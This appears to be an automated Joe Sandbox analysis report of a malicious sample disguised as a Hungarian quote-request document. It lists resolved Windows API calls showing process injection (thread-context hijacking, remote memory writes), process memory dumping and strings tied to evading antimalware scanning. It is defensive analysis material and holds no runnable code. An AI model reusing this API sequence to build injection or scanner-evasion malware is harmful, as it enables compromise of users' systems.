• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction ID: 19050656a804adefad3d059fbe01669ed3f6b8f11629e48de5eb487fd1c7fa94
• Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
• Instruction Fuzzy Hash: 31D05BB23093507AE624965A5D44EEB5BDCCBC6770F11063DF558C7180D7208C01C6B1
APIs
  • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
• Process32First.KERNEL32(?,00000128), ref: 029BADC9
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: AddressProc$FirstHandleModuleProcess32
• String ID:
• API String ID: 2774106396-0
• Opcode ID: 37e87b31df963909330e14da229f09f4e5911dc2002548491c8e095a6cab17eb
• Instruction ID: 649ec80f0472b4314062ba7992304ce371616ac22afb4b79e01c86d327b79140
• Opcode Fuzzy Hash: 37e87b31df963909330e14da229f09f4e5911dc2002548491c8e095a6cab17eb
• Instruction Fuzzy Hash: FFC08072711230178B1076F93D845D3874DCD851B73040462F508D3101DB158C1091D0
APIs
  • Part of subcall function 029BAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
  • Part of subcall function 029BAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
• Process32Next.KERNEL32(?,00000128), ref: 029BADE9
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2237597116-0
                                                                                                                                                  • Opcode ID: 5474e0b085cf2acd618d9dee476e6aa8108b3b5e58a7e2fb15bb5a4215e3f956
                                                                                                                                                  • Instruction ID: 3af475e15907af325e7c23fb44c1374979c3146a8d0b1205ad69ac205d6b05e7
                                                                                                                                                  • Opcode Fuzzy Hash: 5474e0b085cf2acd618d9dee476e6aa8108b3b5e58a7e2fb15bb5a4215e3f956
                                                                                                                                                  • Instruction Fuzzy Hash: 2AC08CA27122301B8A2076F93E889E3878DCD8A2B730448A2F508E3102DF268C1092E0
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,029C356F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,Initialize), ref: 029A7E8B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                  • Instruction ID: 33c5086e3730b34abb0eeec0d98d3c575de34ce6973c41bebd15006ff097a4d0
                                                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                                  • Instruction Fuzzy Hash: 7BC08CF22113000E5E60A9FC1CE92ADA28D19C41357742E21E438CA2E1D316982328A0
                                                                                                                                                  APIs
                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,029C041F,ScanString,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,UacScan,02A27380,029CB7B8,UacInitialize), ref: 029A7E67
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                  • Instruction ID: 5200e24bd57cf557206d324b838ecb86acae355b230dc62c763306ad9360ab75
                                                                                                                                                  • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                                  • Instruction Fuzzy Hash: 2EC08CA12013002E9E5069FC2CED28D528E19842393781A31A438C62F2D32298A32890
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                  • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                  • Instruction ID: 87e0f9b6e245013621d5e58706dce9b149af9c72c9d3408b6d4066b11d481394
                                                                                                                                                  • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                                  • Instruction Fuzzy Hash: EBC012A660033057EF615A99ACD079262DCDB45394F1400A19408D7251E3A0D80046E0
                                                                                                                                                  APIs
                                                                                                                                                  • timeSetEvent.WINMM(00002710,00000000,029CC350,00000000,00000001), ref: 029CC36C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Eventtime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2982266575-0
                                                                                                                                                  • Opcode ID: 1132a67bbce875a4de89e4abcd5b35b8b46bce6de7284edb7f9d95ebe154b168
                                                                                                                                                  • Instruction ID: c0268f04de20904b99d21523d373343ff539204b3a27c5c318ff067b5db8aefd
                                                                                                                                                  • Opcode Fuzzy Hash: 1132a67bbce875a4de89e4abcd5b35b8b46bce6de7284edb7f9d95ebe154b168
                                                                                                                                                  • Instruction Fuzzy Hash: ABC092F17903003AFA1096A56CD2F331ADDD785B50F600416B709EE2C1D6E768104EA8
                                                                                                                                                  APIs
                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 029A4C3F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2525500382-0
                                                                                                                                                  • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                  • Instruction ID: 82039278b19f63ace2295586460b0448b092a9648e935828d58e5399ac3a5e90
                                                                                                                                                  • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                                                  • Instruction Fuzzy Hash: 17B0123820830165FB1823620F317F3005C0F80386F8520519F1CC80D1FB84C0018CF5
                                                                                                                                                  APIs
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 029A4C57
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeString
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3341692771-0
                                                                                                                                                  • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                  • Instruction ID: 09a69dca7c50a57e72ad9d0a3c3ee62f8e1239e16f583f70767c13236ba3db8e
                                                                                                                                                  • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                  • Instruction Fuzzy Hash: 2EA022AC0003038A8F0B332C00300AF223BBFC03003C8C0E80A280A000CF3AC000ACF0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,029A1A03,?,029A2000), ref: 029A15E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,029A2000), ref: 029A16A4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 029A1704
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,029BADA3,?,?,029BAE35,00000000,029BAF11), ref: 029BAB30
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 029BAB48
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 029BAB5A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 029BAB6C
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 029BAB7E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 029BAB90
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 029BABA2
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 029BABB4
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  • GetThreadContext.KERNEL32(00000000,02A27424,ScanString,02A273A8,029BA93C,UacInitialize,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,UacInitialize,02A273A8), ref: 029B9602
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • SetThreadContext.KERNEL32(00000000,02A27424,ScanBuffer,02A273A8,029BA93C,ScanString,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,00000000,-00000008,02A274FC,00000004,02A27500), ref: 029BA317
                                                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02A27424,ScanBuffer,02A273A8,029BA93C,ScanString,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,00000000,-00000008,02A274FC), ref: 029BA324
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                  • API String ID: 2624078988-51457883
                                                                                                                                                  APIs
